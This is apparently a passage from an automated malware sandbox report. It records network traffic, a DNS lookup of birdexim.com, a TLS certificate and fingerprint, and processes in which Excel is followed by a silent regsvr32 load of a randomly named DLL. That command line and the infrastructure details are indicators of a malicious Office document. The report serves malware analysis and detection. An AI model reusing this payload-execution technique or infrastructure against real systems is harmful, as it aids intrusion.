                                            Nov 29, 2020 04:52:27.759526014 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:29.130703926 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:29.283685923 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:29.284029007 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:29.284048080 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:29.284107924 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:29.284313917 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:29.417459011 CET44349167103.21.59.169192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 29, 2020 04:52:26.981009007 CET5219753192.168.2.228.8.8.8
                                            Nov 29, 2020 04:52:27.277591944 CET53521978.8.8.8192.168.2.22
                                            Nov 29, 2020 04:52:28.094377995 CET5309953192.168.2.228.8.8.8
                                            Nov 29, 2020 04:52:28.121705055 CET53530998.8.8.8192.168.2.22
                                            Nov 29, 2020 04:52:28.134105921 CET5283853192.168.2.228.8.8.8
                                            Nov 29, 2020 04:52:28.161222935 CET53528388.8.8.8192.168.2.22
                                            Nov 29, 2020 04:52:28.674283981 CET6120053192.168.2.228.8.8.8
                                            Nov 29, 2020 04:52:28.711837053 CET53612008.8.8.8192.168.2.22
                                            Nov 29, 2020 04:52:28.722668886 CET4954853192.168.2.228.8.8.8
                                            Nov 29, 2020 04:52:28.758135080 CET53495488.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 29, 2020 04:52:26.981009007 CET192.168.2.228.8.8.80xfda2Standard query (0)birdexim.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 29, 2020 04:52:27.277591944 CET8.8.8.8192.168.2.220xfda2No error (0)birdexim.com103.21.59.169A (IP address)IN (0x0001)

                                            HTTPS Packets

                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                            Nov 29, 2020 04:52:27.577666044 CET103.21.59.169443192.168.2.2249167CN=autodiscover.birdexim.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Nov 02 05:51:13 CET 2020 Thu Mar 17 17:40:46 CET 2016Sun Jan 31 05:51:13 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                            CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:04:52:40
                                            Start date:29/11/2020
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13f4b0000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:04:52:45
                                            Start date:29/11/2020
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                            Imagebase:0xffb10000
                                            File size:19456 bytes
                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >